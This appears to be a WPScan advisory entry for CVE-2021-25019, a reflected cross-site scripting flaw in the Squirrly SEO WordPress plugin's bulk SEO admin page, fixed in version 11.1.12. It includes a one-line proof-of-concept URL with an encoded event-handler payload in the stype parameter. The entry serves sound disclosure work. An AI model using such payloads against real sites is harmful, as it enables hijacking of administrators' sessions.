WordPress Plugin Vulnerabilities

SEO Plugin by Squirrly SEO < 11.1.12 - Reflected Cross-Site Scripting

Description

The plugin does not escape the type parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=sq_bulkseo&tab&stype=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+xxx&skeyword=pp

Affects Plugins

squirrly-seo

Fixed in version 11.1.12

References

CVE

CVE-2021-25019

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

cea0ce4b-886a-47cc-8653-a297e9759d09

Timeline

Publicly Published

2022-02-28 (about 6 months ago)

Added

2022-02-28 (about 6 months ago)

Last Updated

2022-04-08 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin